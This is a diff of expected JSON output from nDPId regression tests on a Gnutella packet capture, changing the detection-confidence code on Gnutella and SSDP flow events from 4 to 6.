+00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":90039,"flow_last_seen":180164,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":5191,"flow_avg_l4_payload_len":370,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.61.221.246","src_port":28681,"dst_port":30577,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00561{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":83518,"flow_last_seen":253026,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"5.180.62.37","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00564{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":82059,"flow_last_seen":132832,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"93.29.107.176","src_port":28681,"dst_port":20363,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00566{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":82060,"flow_last_seen":253025,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"196.217.132.111","src_port":28681,"dst_port":25394,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00563{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":82058,"flow_last_seen":191703,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"83.150.49.35","src_port":28681,"dst_port":32448,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00797{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":89829,"flow_last_seen":152619,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.30.221.181","src_port":28681,"dst_port":12012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00797{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":89829,"flow_last_seen":152619,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.30.221.181","src_port":28681,"dst_port":12012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00564{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":82062,"flow_last_seen":251737,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.132.196.58","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00563{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":82059,"flow_last_seen":131670,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.75.43.182","src_port":28681,"dst_port":43502,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00564{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":82058,"flow_last_seen":191703,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"213.120.26.86","src_port":28681,"dst_port":29946,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -1987,48 +1987,48 @@ 00564{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":82061,"flow_last_seen":132833,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.157.183.106","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00562{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":82060,"flow_last_seen":253024,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"115.69.62.99","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00562{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":82062,"flow_last_seen":131672,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.3.103.37","src_port":28681,"dst_port":35589,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00796{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":90138,"flow_last_seen":174723,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.217.176.52","src_port":28681,"dst_port":7446,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":90005,"flow_last_seen":180322,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":5191,"flow_avg_l4_payload_len":370,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.37.255.130","src_port":28681,"dst_port":61616,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00796{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":90138,"flow_last_seen":174723,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.217.176.52","src_port":28681,"dst_port":7446,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":90005,"flow_last_seen":180322,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":5191,"flow_avg_l4_payload_len":370,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.37.255.130","src_port":28681,"dst_port":61616,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00565{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":82064,"flow_last_seen":253025,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"138.199.16.123","src_port":28681,"dst_port":52993,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00797{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":90004,"flow_last_seen":163118,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"72.140.120.41","src_port":28681,"dst_port":47739,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00799{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90138,"flow_last_seen":174930,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3575,"flow_avg_l4_payload_len":357,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.75.52.19","src_port":28681,"dst_port":46010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00797{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":90004,"flow_last_seen":163118,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"72.140.120.41","src_port":28681,"dst_port":47739,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90138,"flow_last_seen":174930,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3575,"flow_avg_l4_payload_len":357,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.75.52.19","src_port":28681,"dst_port":46010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00564{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":82059,"flow_last_seen":131673,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.126.160.158","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00564{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":82058,"flow_last_seen":251738,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.166.226.70","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00796{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":90183,"flow_last_seen":174679,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"95.10.205.67","src_port":28681,"dst_port":11603,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00796{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":90183,"flow_last_seen":174679,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"95.10.205.67","src_port":28681,"dst_port":11603,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4128,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":280014,"flow_last_seen":280014,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":280014,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":57552,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4128,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":493,"flow_packet_id":1,"flow_last_seen":280014,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":280014,"pkt":"AQBef\/\/6CAAn5uVZCABFAADK4LMAAAER3GYKAAIP7\/\/\/+uDQB2wAtgxeTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogTWljcm9zb2Z0IEVkZ2UvOTkuMC4xMTUwLjMwIFdpbmRvd3MNCg0K"} -00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4128,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":280014,"flow_last_seen":280014,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":280014,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":57552,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4128,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":280014,"flow_last_seen":280014,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":280014,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":57552,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4138,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":493,"flow_packet_id":2,"flow_last_seen":281023,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":281023,"pkt":"AQBef\/\/6CAAn5uVZCABFAADK4LQAAAER3GUKAAIP7\/\/\/+uDQB2wAtgxeTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogTWljcm9zb2Z0IEVkZ2UvOTkuMC4xMTUwLjMwIFdpbmRvd3MNCg0K"} 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4148,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":493,"flow_packet_id":3,"flow_last_seen":282039,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":282039,"pkt":"AQBef\/\/6CAAn5uVZCABFAADK4LUAAAER3GQKAAIP7\/\/\/+uDQB2wAtgxeTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogTWljcm9zb2Z0IEVkZ2UvOTkuMC4xMTUwLjMwIFdpbmRvd3MNCg0K"} -00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":95893,"flow_last_seen":95893,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.236.200.137","src_port":28681,"dst_port":48142,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00793{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":96049,"flow_last_seen":96049,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"83.160.143.48","src_port":28681,"dst_port":37036,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":95893,"flow_last_seen":95893,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.236.200.137","src_port":28681,"dst_port":48142,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00793{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":96049,"flow_last_seen":96049,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"83.160.143.48","src_port":28681,"dst_port":37036,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00575{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":93713,"flow_last_seen":93713,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.168.175.31","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00560{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":93713,"flow_last_seen":93713,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.168.175.31","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00794{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":95923,"flow_last_seen":95923,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.246.156.126","src_port":28681,"dst_port":56070,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00792{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":95923,"flow_last_seen":95923,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":282200,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.88.117.219","src_port":28681,"dst_port":6909,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 